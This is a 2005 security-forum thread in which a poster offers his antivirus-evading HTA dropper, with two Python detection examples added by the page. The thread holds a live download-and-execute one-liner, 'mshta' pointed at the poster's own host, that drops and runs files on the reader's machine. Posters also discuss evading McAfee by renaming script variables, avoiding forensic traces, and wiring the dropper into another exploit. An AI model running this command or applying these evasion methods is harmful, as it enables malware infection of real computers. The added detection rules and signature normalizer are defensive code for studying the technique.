My Scripts
Yorn
Since this is a members-only section, would you guys be interested in seeing code for some of the exploit scripts I use? Currently I have one of them hosted on my website. It's generally been closed code because it gets past McAfee and I don't want kids using it "en masse" to infect computers, but I'm willing to share it with admins and security professionals that would like to see what a dedicated black hat might use to get through to your system.

To get an idea of how easy it is, go START->RUN and type:
CODE
mshta http://sec.gravito.com/hta3/?test.exe+RUN

You'll find it copies an "e.vbs" and "test.exe" to your root C: drive and then executes the test.exe file, which will open your CD-ROM. Yes, it is *that* simple and still *that* effective.

I'm also interested if KAV or Norton picks this up. My guess is KAV does, I haven't checked "VirusAll" to find out.
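The one-liner above is exactly the kind of activity an endpoint detection rule can key on without any antivirus signature: mshta.exe accepting a URL or UNC path, a script host running a file dropped straight into the drive root, and mshta spawning an interpreter. The following is an added example written for this page, not code from the thread or from Yorn's HTA; the process-creation records, their field names, the paths and the host sec.example.test are all constructed to illustrate the check and are not real telemetry.

```python
"""Flag mshta.exe fetching a remote HTA, and the script it drops.

Added example for this thread, not Yorn's code. The events below are
constructed to look like endpoint process-creation records (parent
image, image, command line); the field names, paths and the host
sec.example.test are assumptions, not captures from the original post.
"""
import ntpath
import re

# Constructed sample events (not real telemetry): "key=value | key=value".
SAMPLE_EVENTS = [
    r"parent=C:\Windows\explorer.exe | image=C:\Windows\System32\mshta.exe | cmdline=mshta http://sec.example.test/hta3/?test.exe+RUN",
    r"parent=C:\Windows\explorer.exe | image=C:\Windows\System32\mshta.exe | cmdline=mshta.exe C:\Program Files\Vendor\help.hta",
    r"parent=C:\Windows\System32\cmd.exe | image=C:\Windows\System32\mshta.exe | cmdline=mshta \\fileshare\public\update.hta",
    r"parent=C:\Windows\System32\mshta.exe | image=C:\Windows\System32\wscript.exe | cmdline=wscript C:\e.vbs",
    r"parent=C:\Windows\explorer.exe | image=C:\Windows\System32\notepad.exe | cmdline=notepad C:\notes.txt",
]

# http(s)/ftp URL or a UNC path: mshta will load an HTA from either.
REMOTE_SOURCE = re.compile(r"(?i)\b(?:https?|ftp)://\S+|\\\\[^\\\s]+\\\S+")
# A script file sitting directly in a drive root, e.g. C:\e.vbs (where the thread's dropper writes).
ROOT_SCRIPT = re.compile(r'(?i)(?:^|[\s"])[a-z]:\\[^\\\s"]+\.(?:vbs|vbe|js|jse|wsf|hta)\b')
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}


def parse_event(line):
    """Split one 'key=value | key=value' record into a dict."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def classify(event):
    """Return the names of the rules an event trips; an empty list means nothing suspicious."""
    image = ntpath.basename(event.get("image", "")).lower()
    parent = ntpath.basename(event.get("parent", "")).lower()
    cmdline = event.get("cmdline", "")
    hits = []
    if image == "mshta.exe" and REMOTE_SOURCE.search(cmdline):
        hits.append("mshta_remote_hta")           # the START->RUN one-liner from the post
    if image in SCRIPT_HOSTS and ROOT_SCRIPT.search(cmdline):
        hits.append("script_in_drive_root")       # e.vbs dropped to C:\ and executed
    if parent == "mshta.exe" and image in SCRIPT_HOSTS | SHELLS:
        hits.append("mshta_spawned_interpreter")  # the HTA handing off to a script host or shell
    return hits


def scan(lines):
    """Return (cmdline, hits) for every event that trips at least one rule."""
    findings = []
    for line in lines:
        event = parse_event(line)
        hits = classify(event)
        if hits:
            findings.append((event.get("cmdline", ""), hits))
    return findings


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", cmdline)
```

The local HTA under Program Files is deliberately left alone: mshta.exe itself is a legitimate, signed binary, so the rule keys on where the content comes from and what mshta does next, not on the binary being run.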
bonarez
I knew about HTAs but had never seen them used like that, cool.

The firewall (Outpost Pro) warned me a few times (but that's not important).

The AntiVir (www.free-av.com) picked it up and reported it as being "BDS/Iwill.A.3".
ComSec
Didn't think you still had that running, Yorn... I remember that from early last year.

Yes, I think your scripts would be of great interest, mate... like you said, it has passed several AV detections I tested it on.

But I see from above they're catching on to it now.

[eXPhase
I tried implementing that mshta into that HP WebJet Admin exploit. Skiddies don't delete mshta. But for some reason it just didn't work. Still don't know why. Doing the same thing in a normal shell did work.

But when normal echoing of VBS code doesn't work, that mshta thingy also doesn't work. At least, those are my experiences with it.
Yorn
Yes, this code has been refined over time and has been customized with Perl variables. Essentially, the "a", "b", "c" variables in the Visual Basic code correspond to the $A, $B, $C variables in Perl. So anyone can set $A = "slekjslkej" and it will still work. Great for duping VirusScan and others.

The reason why it is detected as an "Illwill" exploit is because I had originally released the code and he kept a copy of it on his website. At first I was a bit peeved, but he kept the text file I included, so I didn't mind. I might do some additional work on this in the very near future and release a version 3.

I realize that primarily this could be used by malicious individuals, but I don't see why an administrator or manager couldn't be shown that even a dedicated hacker can get around VirusScan with a little bit of work.
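Renaming the a/b/c variables per build works against a scanner that hashes or pattern-matches the script bytes as written, because every identifier change produces a new file. A signature taken over an identifier-normalized token stream does not have that weakness. The following is an added example written for this page; it is not Yorn's Perl template or his dropper. The three VBScript snippets are constructed stand-ins: A and B do the same thing with different variable names (the $A = "slekjslkej" trick described above), different case and colon separators, and C is unrelated.

```python
"""Signature over identifier-normalized VBScript tokens.

Added example, not Yorn's Perl template or his dropper. The three
scripts below are constructed stand-ins: A and B do the same thing with
different variable names (the $A = "slekjslkej" trick from the post),
C is unrelated.
"""
import hashlib
import re

SAMPLE_A = 'Set a = CreateObject("WScript.Shell")\nb = "test.exe"\na.Run b, 0, True\n'
SAMPLE_B = (
    "' same script, identifiers renamed, colon separators, different case\n"
    'SET slekjslkej = createobject("WScript.Shell") : Qz9 = "test.exe"\n'
    "slekjslkej.run Qz9, 0, TRUE\n"
)
SAMPLE_C = 'MsgBox "hello"\n'

# VBScript keywords, constants and the automation entry points we keep literal;
# any other bare name is treated as a user-chosen identifier and renamed.
KEYWORDS = {
    "set", "dim", "let", "call", "if", "then", "else", "elseif", "end", "sub",
    "function", "for", "to", "next", "do", "loop", "while", "wend", "exit", "on",
    "error", "resume", "true", "false", "nothing", "empty", "null", "and", "or",
    "not", "is", "new", "createobject", "getobject", "wscript", "msgbox",
    "execute", "eval",
}

TOKEN = re.compile(r'''
    (?P<str>"(?:[^"]|"")*")   # string literal, "" escapes a quote
  | (?P<comment>'[^\n]*)      # ' comment to end of line
  | (?P<num>\d+(?:\.\d+)?)
  | (?P<id>[A-Za-z_]\w*)
  | (?P<sep>\r?\n|:)          # statement separators (newline or colon)
  | (?P<ws>[ \t]+)
  | (?P<op>[^\s\w"])
''', re.VERBOSE)


def normalize(script):
    """Lower-case keywords, rename other identifiers v0, v1, ... in order of
    first appearance, drop whitespace and comments, unify statement separators."""
    out, names, after_dot = [], {}, False
    for m in TOKEN.finditer(script):
        kind, text = m.lastgroup, m.group()
        if kind in ("ws", "comment"):
            continue
        if kind == "id":
            low = text.lower()
            if after_dot or low in KEYWORDS:
                out.append(low)                  # member names (.Run) and keywords stay
            else:
                out.append(names.setdefault(low, f"v{len(names)}"))
        elif kind == "sep":
            if out and out[-1] != ";":
                out.append(";")
        else:
            out.append(text)                     # strings, numbers, operators verbatim
        after_dot = text == "."
    return " ".join(out)


def raw_digest(script):
    """Byte-level hash: what a naive file signature keys on."""
    return hashlib.sha256(script.encode("utf-8")).hexdigest()


def signature(script):
    """Hash of the normalized token stream: stable across identifier renames."""
    return hashlib.sha256(normalize(script).encode("utf-8")).hexdigest()


if __name__ == "__main__":
    print(normalize(SAMPLE_A))
    print("raw hashes equal:  ", raw_digest(SAMPLE_A) == raw_digest(SAMPLE_B))
    print("normalized equal:  ", signature(SAMPLE_A) == signature(SAMPLE_B))
```

String literals and member names are kept verbatim on purpose, since the file name, URL and the Run call are the parts that carry meaning. The caveat is the mirror image of the point above: an author who also varies string constants, splits them with Chr() or wraps the whole body in Execute defeats this normalization too, which is why behavioural detection of what mshta and the script host actually do remains the more durable control.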
Yorn
QUOTE([eXPhase @ Feb 15 2005, 04:02 PM)
But when normal echoing of VBS code doesn't work, that mshta thingy also doesn't work. At least, those are my experiences with it.

Hmm.. I'm thinking maybe I should look at alternatives to using echo to create a VBS to run. That leaves a trace (which most hackers do not do) and the echo portion causes confusion on certain systems.
Invision Power Board © 2001-2005 Invision Power Services, Inc.